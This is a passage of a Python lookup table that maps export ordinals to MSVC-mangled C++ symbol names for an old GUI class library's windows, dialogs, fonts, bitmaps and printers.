1650: b'?GetBitmap@OutputDevice@@QBE?AVBitmap@@ABVPoint@@ABVSize@@@Z',
1651: b'?GetClipRegion@OutputDevice@@QBE?AVRegion@@XZ',
1652: b'?GetOutputSize@OutputDevice@@QBE?AVSize@@XZ',
1653: b'?GetOutputSizePixel@OutputDevice@@UBE?AVSize@@XZ',
1654: b'?GetPixel@OutputDevice@@QBE?AVColor@@ABVPoint@@@Z',
1655: b'?IntersectClipRegion@OutputDevice@@QAE?AVRegion@@ABVRectangle@@@Z',
1656: b'?MoveClipRegion@OutputDevice@@QAE?AVRegion@@FF@Z',
1657: b'?Pop@EnvStack@@QAEPAUStackEntry@@XZ',
1658: b'?Pop@OutputDevice@@QAEXXZ',
1659: b'?Push@EnvStack@@QAEXPAUStackEntry@@@Z',
1660: b'?Push@OutputDevice@@QAEXXZ',
1661: b'?DrawKernText@OutputDevice@@QAEXABVPoint@@ABVString@@GGPAF@Z',
1662: b'?DrawStretchText@OutputDevice@@QAEXABVPoint@@GABVString@@GG@Z',
1663: b'?DrawText@OutputDevice@@QAEXABVPoint@@ABVString@@GG@Z',
1664: b'?GetKernTextSize@OutputDevice@@QBE?AVSize@@ABVString@@GGPAF@Z',
1665: b'?GetStretchTextSize@OutputDevice@@QBE?AVSize@@ABVString@@GGGGG@Z',
1666: b'?GetTextSize@OutputDevice@@QBE?AVSize@@ABVString@@GG@Z',
1667: b'?IsOutline@Font@@QBEEXZ',
1668: b'?IsShadow@Font@@QBEEXZ',
1669: b'?DrawArc@OutputDevice@@QAEXABVRectangle@@ABVPoint@@1@Z',
1670: b'?DrawEllipse@OutputDevice@@QAEXABVRectangle@@@Z',
1671: b'?DrawPie@OutputDevice@@QAEXABVRectangle@@ABVPoint@@1@Z',
1672: b'?DrawPolyLine@OutputDevice@@QAEXABVPolygon@@@Z',
1673: b'?DrawPolyPolygon@OutputDevice@@QAEXABVPolyPolygon@@@Z',
1674: b'?DrawPolygon@OutputDevice@@QAEXABVPolygon@@@Z',
1675: b'??0DevFontList@@QAE@GG@Z',
1676: b'??0DevFontListEntry@@QAE@PBD@Z',
1677: b'??1DevFontList@@QAE@XZ',
1678: b'??1DevFontListEntry@@QAE@XZ',
1679: b'??_GDevFontList@@QAEPAXI@Z',
1680: b'??_GDevFontListEntry@@QAEPAXI@Z',
1681: b'?Count@DevFontList@@QBEKXZ',
1682: b'?EnumFontsProc@@YGHPBUtagLOGFONTA@@PBUtagTEXTMETRICA@@KJ@Z',
1683: b'?First@DevFontList@@QAEPAUDevFontListEntry@@XZ',
1684: b'?GetColorCount@OutputDevice@@QBEKXZ',
1685: b'?GetDevFont@OutputDevice@@QBE?AVFont@@G@Z',
1686: b'?GetDevFontCount@OutputDevice@@QBEGXZ',
1687: b'?GetDevFontSize@OutputDevice@@QBE?AVSize@@ABVFont@@G@Z',
1688: b'?GetDevFontSizeCount@OutputDevice@@QBEGABVFont@@@Z',
1689: b'?GetFontMetric@OutputDevice@@QBE?AVFontMetric@@ABVFont@@@Z',
1690: b'?GetFontMetric@OutputDevice@@QBE?AVFontMetric@@XZ',
1691: b'?GetName@Font@@QBEABVString@@XZ',
1692: b'?GetObject@DevFontList@@QBEPAUDevFontListEntry@@K@Z',
1693: b'?GetSolidColor@OutputDevice@@QBE?AVColor@@ABV2@@Z',
1694: b'?GetStrikeout@Font@@QBE?AW4FontStrikeout@@XZ',
1695: b'?GetUnderline@Font@@QBE?AW4FontUnderline@@XZ',
1696: b'?Insert@DevFontList@@QAEXPAUDevFontListEntry@@K@Z',
1697: b'?IsItalic@Font@@QBEEXZ',
1698: b'?Next@DevFontList@@QAEPAUDevFontListEntry@@XZ',
1699: b'??0VirtualDevice@@QAE@ABVOutputDevice@@@Z',
1700: b'??0VirtualDevice@@QAE@XZ',
1701: b'??1VirtualDevice@@UAE@XZ',
1702: b'??_7VirtualDevice@@6B@',
1703: b'??_GVirtualDevice@@UAEPAXI@Z',
1704: b'?GetOutputSizePixel@VirtualDevice@@UBE?AVSize@@XZ',
1705: b'?SetOutputSize@VirtualDevice@@QAEEABVSize@@E@Z',
1706: b'?SetOutputSizePixel@VirtualDevice@@QAEEABVSize@@E@Z',
1707: b'??0PrnTable@@QAE@XZ',
1708: b'??_GAutoTimer@@QAEPAXI@Z',
1709: b'??_GTimer@@QAEPAXI@Z',
1710: b'?Add@PrnTable@@QAEXPAUHDC__@@PAVPrinter@@@Z',
1711: b'?Get@PrnTable@@QAEPAVPrinter@@PAUHDC__@@@Z',
1712: b'?GetName@Printer@@QBEABVString@@XZ',
1713: b'?IsDefPrinter@Printer@@QBEEXZ',
1714: b'?PrintAbortProc@@YGHPAUHDC__@@H@Z',
1715: b'?Remove@PrnTable@@QAEPAVPrinter@@PAUHDC__@@@Z',
1716: b'??0BME@@QAE@ABU0@@Z',
1717: b'??0BME@@QAE@XZ',
1718: b'??0BrushList@@QAE@GGG@Z',
1719: b'??0FME@@QAE@ABU0@@Z',
1720: b'??0FME@@QAE@XZ',
1721: b'??0FontList@@QAE@GGG@Z',
1722: b'??0PME@@QAE@XZ',
1723: b'??0PenList@@QAE@GGG@Z',
1724: b'??1BME@@QAE@XZ',
1725: b'??1BrushList@@QAE@XZ',
1726: b'??1FME@@QAE@XZ',
1727: b'??1FontList@@QAE@XZ',
1728: b'??1PME@@QAE@XZ',
1729: b'??1PenList@@QAE@XZ',
1730: b'??_GBME@@QAEPAXI@Z',
1731: b'??_GBrushList@@QAEPAXI@Z',
1732: b'??_GFME@@QAEPAXI@Z',
1733: b'??_GFontList@@QAEPAXI@Z',
1734: b'??_GPME@@QAEPAXI@Z',
1735: b'??_GPenList@@QAEPAXI@Z',
1736: b'?First@BrushList@@QAEPAUBME@@XZ',
1737: b'?First@FontList@@QAEPAUFME@@XZ',
1738: b'?First@PenList@@QAEPAUPME@@XZ',
1739: b'?GetCharOrientation@Font@@QBEFXZ',
1740: b'?GetCharSet@Font@@QBE?AW4CharSet@@XZ',
1741: b'?GetColorName@Color@@QBE?AW4ColorName@@XZ',
1742: b'?GetCurObject@BrushList@@QBEPAUBME@@XZ',
1743: b'?GetCurObject@FontList@@QBEPAUFME@@XZ',
1744: b'?GetCurObject@PenList@@QBEPAUPME@@XZ',
1745: b'?GetFamily@Font@@QBE?AW4FontFamily@@XZ',
1746: b'?GetLineOrientation@Font@@QBEFXZ',
1747: b'?GetPitch@Font@@QBE?AW4FontPitch@@XZ',
1748: b'?GetStockBrush@@YGPAUHBRUSH__@@H@Z',
1749: b'?GetStockPen@@YGPAUHPEN__@@H@Z',
1750: b'?GetWeight@Font@@QBE?AW4FontWeight@@XZ',
1751: b'?Insert@BrushList@@QAEXPAUBME@@K@Z',
1752: b'?Insert@FontList@@QAEXPAUFME@@K@Z',
1753: b'?Insert@PenList@@QAEXPAUPME@@K@Z',
1754: b'?Next@BrushList@@QAEPAUBME@@XZ',
1755: b'?Next@FontList@@QAEPAUFME@@XZ',
1756: b'?Next@PenList@@QAEPAUPME@@XZ',
1757: b'?Remove@BrushList@@QAEPAUBME@@PAU2@@Z',
1758: b'?Remove@BrushList@@QAEPAUBME@@XZ',
1759: b'?Remove@FontList@@QAEPAUFME@@PAU2@@Z',
1760: b'?Remove@FontList@@QAEPAUFME@@XZ',
1761: b'?Remove@PenList@@QAEPAUPME@@PAU2@@Z',
1762: b'?Remove@PenList@@QAEPAUPME@@XZ',
1763: b'??0Icon@@QAE@ABV0@@Z',
1764: b'??0Icon@@QAE@ABVResId@@@Z',
1765: b'??0Icon@@QAE@W4IconStyle@@@Z',
1766: b'??0Icon@@QAE@XZ',
1767: b'??1Icon@@QAE@XZ',
1768: b'??4Icon@@QAEAAV0@ABV0@@Z',
1769: b'??8Icon@@QBEEABV0@@Z',
1770: b'??9Icon@@QBEEABV0@@Z',
1771: b'?GetSizePixel@Icon@@QBE?AVSize@@XZ',
1772: b'??0Bitmap@@QAE@ABV0@@Z',
1773: b'??0Bitmap@@QAE@ABVResId@@@Z',
1774: b'??0Bitmap@@QAE@XZ',
1775: b'??1Bitmap@@QAE@XZ',
1776: b'??4Bitmap@@QAEAAV0@ABV0@@Z',
1777: b'??8Bitmap@@QBEEABV0@@Z',
1778: b'??9Bitmap@@QBEEABV0@@Z',
1779: b'?ChangePalette@Bitmap@@QAE?AVPalette@@ABV2@@Z',
1780: b'?GetColorCount@Bitmap@@QBEKXZ',
1781: b'?GetPalette@Bitmap@@QBE?AVPalette@@XZ',
1782: b'?GetSizeBytes@Bitmap@@QBEKXZ',
1783: b'?GetSizePixel@Bitmap@@QBE?AVSize@@XZ',
1784: b'?GetStockPalette@@YGPAUHPALETTE__@@H@Z',
1785: b'?lmemcpy@@YGXPAXPBXK@Z',
1786: b'??0GDIArray@@QAE@XZ',
1787: b'??0SaveStack@@QAE@GG@Z',
1788: b'??0SaveStruct@@QAE@XZ',
1789: b'??1GDIArray@@QAE@XZ',
1790: b'??1SaveStack@@QAE@XZ',
1791: b'??_GBrush@@QAEPAXI@Z',
1792: b'??_GPen@@QAEPAXI@Z',
1793: b'?ChangeSize@DynArray@@QAEKK@Z',
1794: b'?Count@SaveStack@@QBEKXZ',
1795: b'?EnumMetaProc@@YGHPAUHDC__@@PAUtagHANDLETABLE@@PAUtagMETARECORD@@HJ@Z',
1796: b'?GetSize@DynArray@@QBEKXZ',
1797: b'?Pop@SaveStack@@QAEPAUSaveStruct@@XZ',
1798: b'?Push@SaveStack@@QAEXPAUSaveStruct@@@Z',
1799: b'?IGetBmpData@@YG?AUBmpData@@ABVBitmap@@@Z',
1800: b'?ISetBmpData@@YGEPAUBmpPalette@@PAUBmpBits@@AAVBitmap@@@Z',
1801: b'?PlayMetaProc@@YGHPAUHDC__@@PAUtagHANDLETABLE@@PAUtagMETARECORD@@HJ@Z',
1802: b'??0MyDropTarget@@QAE@PAVWindow@@@Z',
1803: b'??0SVLookList@@QAE@GG@Z',
1804: b'??0TransferFormat@@QAE@K@Z',
1805: b'??0Window@@QAE@FPAV0@G@Z',
1806: b'??0Window@@QAE@PAV0@ABVResId@@@Z',
1807: b'??0Window@@QAE@PAV0@G@Z',
1808: b'??1MyDropTarget@@UAE@XZ',
1809: b'??1SVLookList@@QAE@XZ',
1810: b'??1Window@@UAE@XZ',
1811: b'??_7MyDropTarget@@6B@',
1812: b'??_7Window@@6B@',
1813: b'??_GDragServer@@QAEPAXI@Z',
1814: b'??_GMyDropTarget@@UAEPAXI@Z',
1815: b'??_GSVLookList@@QAEPAXI@Z',
1816: b'??_GWindow@@UAEPAXI@Z',
1817: b'?CaptureMouse@Window@@QAEXXZ',
1818: b'?ChangeCursor@Window@@QAEPAVCursor@@PAV2@@Z',
1819: b'?ChangeHelpId@Window@@QAEKK@Z',
1820: b'?ChangeOutputSizePixel@Window@@QAE?AVSize@@ABV2@@Z',
1821: b'?ChangeParent@Window@@QAEPAV1@PAV1@@Z',
1822: b'?ChangePointer@Window@@QAE?AVPointer@@ABV2@@Z',
1823: b'?ChangePosPixel@Window@@QAE?AVPoint@@ABV2@@Z',
1824: b'?ChangeSizePixel@Window@@QAE?AVSize@@ABV2@@Z',
1825: b'?ChangeUpdateMode@Window@@QAEEE@Z',
1826: b'?Disable@Window@@QAEXXZ',
1827: b'?DragEnter@MyDropTarget@@UAEEW4DropAction@@ABVPoint@@@Z',
1828: b'?DragLeave@MyDropTarget@@UAEXXZ',
1829: b'?DragOver@MyDropTarget@@UAEEW4DropAction@@ABVPoint@@@Z',
1830: b'?Drop@MyDropTarget@@UAEEW4DropAction@@ABVPoint@@@Z',
1831: b'?Drop@Window@@UAEEABVDropEvent@@@Z',
1832: b'?Enable@Window@@QAEXXZ',
1833: b'?EnableDrop@Window@@QAEXE@Z',
1834: b'?Flash@Window@@QAEXXZ',
1835: b'?GetClassCursor@@YGPAUHICON__@@PAUHWND__@@@Z',
1836: b'?GetCursor@Window@@QBEPAVCursor@@XZ',
1837: b'?GetFocus@Window@@UAEXXZ',
1838: b'?GetHelpId@Window@@QBEKXZ',
1839: b'?GetHelpText@Window@@QBE?AVString@@XZ',
1840: b'?GetOutputSizePixel@Window@@UBE?AVSize@@XZ',
1841: b'?GetParent@Window@@QBEPAV1@XZ',
1842: b'?GetPointer@Window@@QBE?AVPointer@@XZ',
1843: b'?GetPosPixel@Window@@QBE?AVPoint@@XZ',
1844: b'?GetSizePixel@Window@@QBE?AVSize@@XZ',
1845: b'?GetText@Window@@QBE?AVString@@XZ',
1846: b'?GetType@TransferFormat@@QBEKXZ',
1847: b'?GetUpdateMode@Window@@QBEEXZ',
1848: b'?GetWindow@DropTarget@@QBEPAVWindow@@XZ',
1849: b'?GrabFocus@Window@@QAEXXZ',
1850: b'?HasFocus@Window@@QBEEXZ',
1851: b'?Hide@Window@@QAEXXZ',
1852: b'?InitDragServer@MyDropTarget@@AAEXXZ',
1853: b'?Insert@SVLookList@@QAEXPAVWindow@@@Z',
1854: b'?Invalidate@Window@@QAEXABVRectangle@@@Z',
1855: b'?Invalidate@Window@@QAEXXZ',
1856: b'?InvalidateForeground@Window@@QAEXABVRectangle@@@Z',
1857: b'?InvalidateForeground@Window@@QAEXXZ',
1858: b'?IsDropEnabled@Window@@QBEEXZ',
1859: b'?IsEnabled@StarObjectMgr@@QBEEXZ',
1860: b'?IsEnabled@Window@@QBEEXZ',
1861: b'?IsSVLook@Window@@QBEEXZ',
1862: b'?IsVisible@Window@@QBEEXZ',
1863: b'?KeyInput@Window@@UAEXABVKeyEvent@@@Z',
1864: b'?LoseFocus@Window@@UAEXXZ',
1865: b'?MouseButtonDown@Window@@UAEXABVMouseEvent@@@Z',
1866: b'?MouseButtonUp@Window@@UAEXABVMouseEvent@@@Z',
1867: b'?MouseMove@Window@@UAEXABVMouseEvent@@@Z',
1868: b'?Move@Window@@UAEXXZ',
1869: b'?OutputToScreenPixel@Window@@QBE?AVPoint@@ABV2@@Z',
1870: b'?Paint@Window@@UAEXABVRectangle@@@Z',
1871: b'?QueryDrop@Window@@UAEEABVDropEvent@@@Z',
1872: b'?ReleaseMouse@Window@@QAEXXZ',
1873: b'?Remove@ControlList@@QAEPAVWindow@@PAV2@@Z',
1874: b'?Remove@SVLookList@@QAEPAVWindow@@PAV2@@Z',
1875: b'?RequestData@MyDropTarget@@AAEXPAVDragServer@@@Z',
1876: b'?RequestHelp@Window@@UAEXABVHelpEvent@@@Z',
1877: b'?Resize@Window@@UAEXXZ',
1878: b'?ScreenToOutputPixel@Window@@QBE?AVPoint@@ABV2@@Z',
1879: b'?Scroll@Window@@QAEXFF@Z',
1880: b'?Scroll@Window@@QAEXFFABVRectangle@@@Z',
1881: b'?SetHelpText@Window@@QAEXABVString@@@Z',
1882: b'?SetPosSize@Window@@QAEXABVPoint@@ABVSize@@@Z',
1883: b'?SetPosSizePixel@Window@@QAEXABVPoint@@ABVSize@@@Z',
1884: b'?SetText@Window@@QAEXABVString@@@Z',
1885: b'?Show@Window@@QAEXXZ',
1886: b'?ToTop@Window@@QAEXXZ',
1887: b'?Update@Window@@QAEXXZ',
1888: b'??0ControlList@@QAE@GG@Z',
1889: b'?GetCancelButtonText@International@@QBEABVString@@XZ',
1890: b'?GetCancelButtonText@LanguageTable@@QBEABVString@@XZ',
1891: b'?GetHelpButtonText@International@@QBEABVString@@XZ',
1892: b'?GetHelpButtonText@LanguageTable@@QBEABVString@@XZ',
1893: b'?GetOKButtonText@International@@QBEABVString@@XZ',
1894: b'?GetOKButtonText@LanguageTable@@QBEABVString@@XZ',
1895: b'?Insert@ControlList@@QAEXPAVWindow@@K@Z',
1896: b'?TransferCtrlBits@@YGKG@Z',
1897: b'?TransferEditBits@@YGKG@Z',
1898: b'??0PalWindowList@@QAE@GG@Z',
1899: b'??0PopupList@@QAE@GG@Z',
1900: b'??0SysWin@@QAE@FPAVWindow@@G@Z',
1901: b'??0SysWin@@QAE@PAVWindow@@ABVResId@@@Z',
1902: b'??1SysWin@@UAE@XZ',
1903: b'??_7SysWin@@6B@',
1904: b'??_GSysWin@@UAEPAXI@Z',
1905: b'?Activate@SysWin@@UAEXXZ',
1906: b'?AnimatePalette@SysWin@@QAEXGABVPalette@@@Z',
1907: b'?ChangePalette@SysWin@@QAE?AVPalette@@ABV2@@Z',
1908: b'?Close@SysWin@@UAEEXZ',
1909: b'?Deactivate@SysWin@@UAEXXZ',
1910: b'?Insert@PalWindowList@@QAEXPAVWindow@@K@Z',
1911: b'?Insert@PopupList@@QAEXPAVWindow@@@Z',
1912: b'?IsActive@SysWin@@QBEEXZ',
1913: b'?Remove@PopupList@@QAEPAVWindow@@PAV2@@Z',
1914: b'??0WorkWindow@@QAE@FPAVWindow@@G@Z',
1915: b'??0WorkWindow@@QAE@PAVWindow@@ABVResId@@@Z',
1916: b'??0WorkWindow@@QAE@PAVWindow@@G@Z',
1917: b'??1WorkWindow@@UAE@XZ',
1918: b'??_7WorkWindow@@6B@',
1919: b'??_GWorkWindow@@UAEPAXI@Z',
1920: b'?ChangeIcon@WorkWindow@@QAE?AVIcon@@ABV2@@Z',
1921: b'?ChangeMinOutputSizePixel@WorkWindow@@QAE?AVSize@@ABV2@@Z',
1922: b'?ChangeOptOutputSizePixel@WorkWindow@@QAE?AVSize@@ABV2@@Z',
1923: b'?GetIcon@WorkWindow@@QBE?AVIcon@@XZ',
1924: b'?GetMinOutputSizePixel@WorkWindow@@QBE?AVSize@@XZ',
1925: b'?GetOptOutputSizePixel@WorkWindow@@QBE?AVSize@@XZ',
1926: b'?InitWorkWin@@YGXPAVWorkWindow@@@Z',
1927: b'?IsMaximized@WorkWindow@@QBEEXZ',
1928: b'?IsMinimized@WorkWindow@@QBEEXZ',
1929: b'?Maximize@WorkWindow@@QAEXXZ',
1930: b'?Minimize@WorkWindow@@QAEXXZ',
1931: b'?Restore@WorkWindow@@QAEXXZ',
1932: b'??0MDIWindow@@QAE@PAVWorkWindow@@ABVResId@@@Z',
1933: b'??0MDIWindow@@QAE@PAVWorkWindow@@G@Z',
1934: b'??1MDIWindow@@UAE@XZ',
1935: b'??_7MDIWindow@@6B@',
1936: b'??_GMDIWindow@@UAEPAXI@Z',
1937: b'?IsMDIActivate@MDIWindow@@QAEEXZ',
1938: b'??0FloatWinList@@QAE@GG@Z',
1939: b'??0FloatingWindow@@QAE@PAVWindow@@ABVResId@@@Z',
1940: b'??0FloatingWindow@@QAE@PAVWindow@@G@Z',
1941: b'??1FloatingWindow@@UAE@XZ',
1942: b'??_7FloatingWindow@@6B@',
1943: b'??_GFloatingWindow@@UAEPAXI@Z',
1944: b'?ChangeZoomInOutputSizePixel@FloatingWindow@@QAE?AVSize@@ABV2@@Z',
1945: b'?GetZoomInOutputSizePixel@FloatingWindow@@QBE?AVSize@@XZ',
1946: b'?Insert@FloatWinList@@QAEXPAVFloatingWindow@@@Z',
1947: b'?IsZoomedIn@FloatingWindow@@QBEEXZ',
1948: b'?Remove@FloatWinList@@QAEPAVFloatingWindow@@PAV2@@Z',
1949: b'?Zoom@FloatingWindow@@UAEXXZ',
1950: b'?ZoomIn@FloatingWindow@@QAEXXZ',
1951: b'?ZoomOut@FloatingWindow@@QAEXXZ',
1952: b'??0Dialog@@QAE@FPAVWindow@@G@Z',
1953: b'??0Dialog@@QAE@PAVWindow@@ABVResId@@@Z',
1954: b'??0Dialog@@QAE@PAVWindow@@G@Z',
1955: b'??0ModalDialog@@QAE@FPAVWindow@@G@Z',
1956: b'??0ModalDialog@@QAE@PAVWindow@@ABVResId@@@Z',
1957: b'??0ModalDialog@@QAE@PAVWindow@@G@Z',
1958: b'??0ModelessDialog@@QAE@PAVWindow@@ABVResId@@@Z',
1959: b'??0ModelessDialog@@QAE@PAVWindow@@G@Z',
1960: b'??1Dialog@@UAE@XZ',
1961: b'??1ModalDialog@@UAE@XZ',
1962: b'??1ModelessDialog@@UAE@XZ',
1963: b'??_7Dialog@@6B@',
1964: b'??_7ModalDialog@@6B@',
1965: b'??_7ModelessDialog@@6B@',
1966: b'??_GDialog@@UAEPAXI@Z',
1967: b'??_GModalDialog@@UAEPAXI@Z',
1968: b'??_GModelessDialog@@UAEPAXI@Z',
1969: b'?Close@ModalDialog@@UAEEXZ',
1970: b'?EndDialog@ModalDialog@@QAEXF@Z',
1971: b'?Execute@ModalDialog@@QAEFXZ',
1972: b'?InitModalDialog@@YGXPAVModalDialog@@G@Z',
1973: b'?IsInExecute@ModalDialog@@QBEEXZ',
1974: b'?IsPinIn@ModelessDialog@@QBEEXZ',
1975: b'??0ErrorBox@@QAE@PAVWindow@@ABVResId@@@Z',
1976: b'??0ErrorBox@@QAE@PAVWindow@@GABVString@@@Z',
1977: b'??0InfoBox@@QAE@PAVWindow@@ABVResId@@@Z',
1978: b'??0InfoBox@@QAE@PAVWindow@@ABVString@@@Z',
1979: b'??0MessBox@@QAE@PAVWindow@@ABVResId@@@Z',
1980: b'??0MessBox@@QAE@PAVWindow@@GABVString@@1@Z',
1981: b'??0QueryBox@@QAE@PAVWindow@@ABVResId@@@Z',
1982: b'??0QueryBox@@QAE@PAVWindow@@GABVString@@@Z',
1983: b'??0WarningBox@@QAE@PAVWindow@@ABVResId@@@Z',
1984: b'??0WarningBox@@QAE@PAVWindow@@GABVString@@@Z',
1985: b'??1ErrorBox@@UAE@XZ',
1986: b'??1MessBox@@UAE@XZ',
1987: b'??1QueryBox@@UAE@XZ',
1988: b'??1WarningBox@@UAE@XZ',
1989: b'??_7ErrorBox@@6B@',
1990: b'??_7InfoBox@@6B@',
1991: b'??_7MessBox@@6B@',
1992: b'??_7QueryBox@@6B@',
1993: b'??_7WarningBox@@6B@',
1994: b'??_GErrorBox@@UAEPAXI@Z',
1995: b'??_GInfoBox@@UAEPAXI@Z',
1996: b'??_GMessBox@@UAEPAXI@Z',
1997: b'??_GQueryBox@@UAEPAXI@Z',
1998: b'??_GWarningBox@@UAEPAXI@Z',
1999: b'?Execute@MessBox@@QAEFXZ',
2000: b'?GetMessText@MessBox@@QBE?AVString@@XZ',
2001: b'?SetButtonText@MessBox@@QAEXGABVString@@@Z',
2002: b'?SetMessText@MessBox@@QAEXABVString@@@Z',
2003: b'??0SystemDialog@@QAE@FPAVWindow@@G@Z',
2004: b'??0SystemDialog@@QAE@PAVWindow@@ABVResId@@@Z',
2005: b'??1ControlList@@QAE@XZ',
2006: b'??1SystemDialog@@UAE@XZ',
2007: b'??_7SystemDialog@@6B@',
2008: b'??_GControlList@@QAEPAXI@Z',
2009: b'??_GSystemDialog@@UAEPAXI@Z',
2010: b'?First@ControlList@@QAEPAVWindow@@XZ',
2011: b'?InitSystemDialog@@YGXPAVSystemDialog@@@Z',
2012: b'?Next@ControlList@@QAEPAVWindow@@XZ',
2013: b'??0FDFilterList@@QAE@GG@Z',
2014: b'??0FileDialog@@QAE@PAVWindow@@ABVResId@@@Z',
2015: b'??0FileDialog@@QAE@PAVWindow@@G@Z',
2016: b'??0FilterItem@@QAE@XZ',
2017: b'??1FDFilterList@@QAE@XZ',
2018: b'??1FileDialog@@UAE@XZ',
2019: b'??1FilterItem@@QAE@XZ',
2020: b'??_7FileDialog@@6B@',
2021: b'??_GFDFilterList@@QAEPAXI@Z',
2022: b'??_GFileDialog@@UAEPAXI@Z',
2023: b'??_GFilterItem@@QAEPAXI@Z',
2024: b'?AddFilter@FileDialog@@QAEXABVString@@0@Z',
2025: b'?Clear@FDFilterList@@QAEXXZ',
2026: b'?Count@FDFilterList@@QBEKXZ',
2027: b'?Execute@FileDialog@@QAEFXZ',
2028: b'?FileSelect@FileDialog@@UAEXXZ',
2029: b'?FilterSelect@FileDialog@@UAEXXZ',
2030: b'?First@FDFilterList@@QAEPAUFilterItem@@XZ',
2031: b'?GetCurFilter@FileDialog@@QBE?AVString@@XZ',
2032: b'?GetCurPos@FDFilterList@@QBEKXZ',
2033: b'?GetObject@FDFilterList@@QBEPAUFilterItem@@K@Z',
2034: b'?GetPath@FileDialog@@QBE?AVString@@XZ',
2035: b'?InitFileDialog@@YGXPAVFileDialog@@G@Z',
2036: b'?Insert@FDFilterList@@QAEXPAUFilterItem@@K@Z',
2037: b'?IsSet@Link@@QBEEXZ',
2038: b'?Next@FDFilterList@@QAEPAUFilterItem@@XZ',
2039: b'?OK@FileDialog@@UAEJXZ',
2040: b'?Remove@FDFilterList@@QAEPAUFilterItem@@XZ',
2041: b'?RemoveAllFilter@FileDialog@@QAEXXZ',
2042: b'?RemoveFilter@FileDialog@@QAEXABVString@@@Z',
2043: b'?SetCurFilter@FileDialog@@QAEXABVString@@@Z',
2044: b'?SetDefaultExt@FileDialog@@QAEXABVString@@@Z',
2045: b'?SetPath@FileDialog@@QAEXABVString@@@Z',
2046: b'??0PrintDialog@@QAE@PAVWindow@@ABVResId@@@Z',
2047: b'??0PrintDialog@@QAE@PAVWindow@@G@Z',
2048: b'??0PrinterSetupDialog@@QAE@PAVWindow@@ABVResId@@@Z',
2049: b'??0PrinterSetupDialog@@QAE@PAVWindow@@G@Z',
2050: b'??1PrintDialog@@UAE@XZ',
2051: b'??1PrinterSetupDialog@@UAE@XZ',
2052: b'??_7PrintDialog@@6B@',
2053: b'??_7PrinterSetupDialog@@6B@',
2054: b'??_GPrintDialog@@UAEPAXI@Z',
2055: b'??_GPrinterSetupDialog@@UAEPAXI@Z',
2056: b'?CheckCollate@PrintDialog@@QAEXE@Z',
2057: b'?CheckSelection@PrintDialog@@QAEXE@Z',
2058: b'?EnableCollate@PrintDialog@@QAEXE@Z',
2059: b'?EnablePageFields@PrintDialog@@QAEXE@Z',
2060: b'?EnableSelection@PrintDialog@@QAEXE@Z',
2061: b'?Execute@PrintDialog@@QAEFXZ',
2062: b'?Execute@PrinterSetupDialog@@QAEFXZ',
2063: b'?InitPrintDialog@@YGXPAVPrintDialog@@@Z',
2064: b'?InitPrinterSetupDialog@@YGXPAVPrinterSetupDialog@@@Z',
2065: b'?IsJobActive@Printer@@QBEEXZ',
2066: b'?IsValid@Printer@@QBEEXZ',
2067: b'??0ColorDialog@@QAE@PAVWindow@@ABVResId@@@Z',
2068: b'??0ColorDialog@@QAE@PAVWindow@@G@Z',
2069: b'??1ColorDialog@@UAE@XZ',
2070: b'??_7ColorDialog@@6B@',
2071: b'??_GColorDialog@@UAEPAXI@Z',
2072: b'?ChangeColor@ColorDialog@@QAE?AVColor@@ABV2@@Z',
2073: b'?Execute@ColorDialog@@QAEFXZ',
2074: b'??0FontDialog@@QAE@PAVWindow@@ABVResId@@@Z',
2075: b'??0FontDialog@@QAE@PAVWindow@@G@Z',
2076: b'??1FontDialog@@UAE@XZ',
2077: b'??_7FontDialog@@6B@',
2078: b'??_GFontDialog@@UAEPAXI@Z',
2079: b'?ChangeFixedFontsOnly@FontDialog@@QAEEE@Z',
2080: b'?ChangeFont@FontDialog@@QAE?AVFont@@ABV2@@Z',
2081: b'?ChangePrinter@FontDialog@@QAEPAVPrinter@@PAV2@@Z',
2082: b'?Execute@FontDialog@@QAEFXZ',
2083: b'?InitFontDialog@@YGXPAVFontDialog@@G@Z',
2084: b'??0Pointer@@QAE@ABV0@@Z',
2085: b'??0Pointer@@QAE@ABVResId@@@Z',
2086: b'??0Pointer@@QAE@W4PointerStyle@@@Z',
2087: b'??0Pointer@@QAE@XZ',
2088: b'??1Pointer@@QAE@XZ',
2089: b'??4Pointer@@QAEAAV0@ABV0@@Z',
2090: b'??8Pointer@@QBEEABV0@@Z',
2091: b'??9Pointer@@QBEEABV0@@Z',
2092: b'?ChangePosPixel@Pointer@@SG?AVPoint@@ABV2@@Z',
2093: b'?GetPosPixel@Pointer@@SG?AVPoint@@XZ',
2094: b'?Hide@Pointer@@SGXXZ',
2095: b'?IsVisible@Pointer@@SGEXZ',
2096: b'?Show@Pointer@@SGXXZ',
2097: b'??0Cursor@@QAE@ABV0@@Z',
2098: b'??0Cursor@@QAE@XZ',
2099: b'??1Cursor@@QAE@XZ',
2100: b'??4Cursor@@QAEAAV0@ABV0@@Z',
2101: b'??8Cursor@@QBEEABV0@@Z',
2102: b'??9Cursor@@QBEEABV0@@Z',
2103: b'?ChangePos@Cursor@@QAE?AVPoint@@ABV2@@Z',
2104: b'?ChangeSize@Cursor@@QAE?AVSize@@ABV2@@Z',
2105: b'?ChangeSlant@Cursor@@QAEFF@Z',
2106: b'?Hide@Cursor@@QAEXXZ',
2107: b'?Show@Cursor@@QAEXXZ',
2108: b'??0Control@@QAE@FPAVWindow@@G@Z',
2109: b'??0Control@@QAE@PAVWindow@@ABVResId@@@Z',
2110: b'??0Control@@QAE@PAVWindow@@G@Z',
2111: b'??1Control@@UAE@XZ',
2112: b'??9Rectangle@@QBEEABV0@@Z',
2113: b'??_7Control@@6B@',
2114: b'??_GControl@@UAEPAXI@Z',
2115: b'?DrawCtrlText@Control@@QAEXABVPoint@@ABVString@@GGE@Z',
2116: b'?GetCtrlTextSize@Control@@QBE?AVSize@@ABVString@@GG@Z',
2117: b'?GetFocus@Control@@UAEXXZ',
2118: b'?HideFocus@Control@@QAEXXZ',
2119: b'?InitControl@@YGXPAVControl@@@Z',
2120: b'?LoseFocus@Control@@UAEXXZ',
2121: b'?ShowFocus@Control@@QAEXABVRectangle@@@Z',
2122: b'??0Button@@QAE@FPAVWindow@@G@Z',
2123: b'??0Button@@QAE@PAVWindow@@ABVResId@@@Z',
2124: b'??0Button@@QAE@PAVWindow@@G@Z',
2125: b'??0CancelButton@@QAE@PAVWindow@@ABVResId@@@Z',
2126: b'??0CancelButton@@QAE@PAVWindow@@G@Z',
2127: b'??0CheckBox@@QAE@PAVWindow@@ABVResId@@@Z',
2128: b'??0CheckBox@@QAE@PAVWindow@@G@Z',
2129: b'??0HelpButton@@QAE@PAVWindow@@ABVResId@@@Z',
2130: b'??0HelpButton@@QAE@PAVWindow@@G@Z',
